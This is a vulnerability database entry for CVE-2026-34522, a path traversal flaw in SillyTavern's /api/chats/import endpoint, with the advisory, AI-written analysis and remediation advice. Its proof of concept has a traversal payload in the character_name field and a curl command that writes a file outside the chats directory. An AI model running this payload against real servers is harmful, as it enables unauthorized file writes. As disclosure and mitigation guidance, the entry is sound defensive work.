CVE-2026-34522
HIGHSeverity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
A path traversal vulnerability in /api/chats/import allows an authenticated attacker to write attacker-controlled files outside the intended chats directory by injecting traversal sequences into character_name.
Details
character_name is used unsafely as part of the destination filename and then passed into path.join(...) without sanitization.
Evidence:
- Import handler entrypoint:
<https://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/endpoints/chats.js#L680-L686>
- Unsanitized
character_nameused in output filename:
<https://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/endpoints/chats.js#L719-L723>
- Same write pattern in JSONL import branch:
<https://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/endpoints/chats.js#L759-L766>
- Endpoint auth context (authenticated user access):
<https://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/server-main.js#L239>
Example payload:
character_name=../../../../tmp/st_poc
This causes the final destination path to escape from <user>/chats/<avatar>/... and write to an attacker-controlled location such as /tmp/... (or any writable path for the service account).
PoC
Prerequisites:
- Valid authenticated session cookie (
cookie.txt) - Valid CSRF token (
$TOKEN)
Prepare payload:
printf '{"user_name":"u","chat_metadata":{}}\n{"name":"u","mes":"owned"}\n' >/tmp/poc.jsonlTrigger arbitrary write:
curl -b cookie.txt -H "x-csrf-token: $TOKEN" \
-F "avatar=@/tmp/poc.jsonl" \
-F "file_type=jsonl" \
-F "avatar_url=a.png" \
-F "character_name=../../../../tmp/st_poc" \
-F "user_name=u" \
http://TARGET:8000/api/chats/importObserved result:
- A file is created outside chats directory, for example:
/tmp/st_poc - <timestamp> imported.jsonl
Impact
- Integrity: attacker can create files in unintended filesystem locations.
- Availability: can be used for disk abuse and disruptive file placement.
- Can become more severe when chained with other local processing behaviors.
Resolution
The issue was addressed in version 1.17.0
AnalysisAI
Authenticated path traversal in SillyTavern's chat import API enables authenticated users to write arbitrary files outside intended directories. Attackers exploit unsanitized 'character_name' parameters in /api/chats/import (versions prior to 1.17.0) to inject traversal sequences (e.g., '../../../../tmp/malicious'), causing file writes to arbitrary filesystem locations accessible to the service account. With CVSS 8.1 (AV:N/AC:L/PR:L), this requires low-privilege authentication but no user intera
Technical ContextAI
This vulnerability affects the npm package 'sillytavern' (pkg:npm/sillytavern), a local-first AI chat interface application built on Node.js. The flaw resides in the chat import functionality at /api/chats/import endpoint, specifically in the handling of file uploads for character chat histories. The vulnerable code in src/endpoints/chats.js (lines 680-766) directly concatenates user-supplied 'character_name' parameter into filesystem path operations via Node.js path.join() without input validation or sanitization. This represents a classic CWE-22 (Improper Limitation of a Pathname to a Restricted Directory) implementation flaw. The application intends to store imported chats in a structured directory hierarchy (<user>/chats/<avatar>/), but the lack of path traversal defenses allows attackers to inject directory traversal sequences (../) that escape the intended sandbox. Node.js path.join() does not inherently prevent traversal attacks when components contain unvalidated user input. The vulnerability exists in both JSON and JSONL import code paths, affecting multiple file format handlers within the same endpoint.
RemediationAI
Upgrade immediately to SillyTavern version 1.17.0 or later, which addresses the path traversal vulnerability through input sanitization of the character_name parameter. The fix is available through standard npm update procedures (npm update sillytavern) or by pulling the latest release from the GitHub repository at https://github.com/SillyTavern/SillyTavern. For users unable to upgrade immediately, implement temporary mitigations: restrict /api/chats/import endpoint access through reverse proxy rules (nginx/Apache location blocks), implement filesystem permissions to limit write access for the SillyTavern service account to only the intended chats directory, or disable the import functionality entirely if not operationally required. Review filesystem audit logs for suspicious file creation patterns outside expected directories (grep for recently created files with 'imported.jsonl' suffix in unexpected paths). After patching, verify the fix by attempting the proof-of-concept attack from the advisory-properly patched systems should reject traversal sequences. Consult the official security advisory at https://github.com/SillyTavern/SillyTavern/security/advisories/GHSA-xvww-xhx6-22pf for additional vendor guidance and validated patch instructions.
Same weakness CWE-22 – Path Traversal
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-xvww-xhx6-22pf